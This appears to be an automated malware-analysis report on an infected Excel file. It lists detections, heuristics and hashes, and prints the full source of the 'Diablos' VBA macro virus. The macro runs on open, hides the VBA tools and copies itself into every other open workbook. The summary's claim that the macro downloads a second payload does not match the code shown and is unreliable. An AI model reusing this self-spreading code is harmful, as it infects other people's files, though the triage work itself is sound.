Verdict: MALICIOUS
Risk Score: 300

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This Excel file contains a critical Auto_Open VBA macro, indicating it is designed to execute malicious code upon opening. The presence of ClamAV detections for 'Xls.Trojan.Clonar-1' strongly suggests a known trojan family. The macro's likely purpose is to download and execute a secondary payload, a common technique for this type of threat.
Heuristics (6)

- ClamAV: Xls.Trojan.Clonar-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Clonar-1.
- Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE): A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): The OLE file is 18,776 bytes but its declared streams total only 0 bytes; 18,776 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code.
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro.
- CFB header with no readable streams (medium, OLE_PARSE_EMPTY_STREAMS): The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous; it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2978 bytes |

- SHA-256: eab0d60a590e10ef0091610b1b5657f576248a95e93c507b87f65da47f531e97
- Detection: ClamAV Xls.Trojan.Clonar-1
- Obfuscation or payload: unlikely

Preview of macros.bas (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Diablos"
' Diablos Macro
' Bios Virus Macro - (C) Copyright 1998 - Spalaci
Sub auto_open()
Attribute auto_open.VB_Description = "Macro grabada el 5/07/98 por Epson"
Attribute auto_open.VB_ProcData.VB_Invoke_Func = "D\n14"
    ' Disable messages (suppresses prompts the user would otherwise see)
    Application.DisplayAlerts = False
    ' Disable tools + keys (hides the Macro and Visual Basic command bars)
    Set Bar1 = CommandBars("Macro")
    Bar1.Enabled = False
    Set Bar2 = CommandBars("Visual Basic")
    Bar2.Enabled = False
    ' Clone Diablos code: write this module to disk so it can be re-imported
    ThisWorkbook.VBProject.VBComponents("Diablos").Export ("C:\Windows\Diablos.bas")
    ' Clean + infection: replace any existing copy in every other open workbook
    For Each I In Workbooks
        If I.Name <> ThisWorkbook.Name Then
            For Each J In I.VBProject.VBComponents
                If J.Name = "Diablos" Then
                    I.VBProject.VBComponents.Remove I.VBProject.VBComponents("Diablos")
                End If
            Next J
            I.VBProject.VBComponents.Import ("C:\Windows\Diablos.bas")
        End If
    Next I
    ' Label: date-triggered visible side effect on the 30th of the month
    If Day(Date) = 30 Then
        CommandBars.LargeButtons = True
    End If
    ' Enable messages
    Application.DisplayAlerts = True
End Sub
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_office_off000060a8.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x60A8 | 18776 bytes |

- SHA-256: e5fef41f8d67b80e6d57c6eaa487fa52b4e4231b9bc57c7394ac9d85e82453c4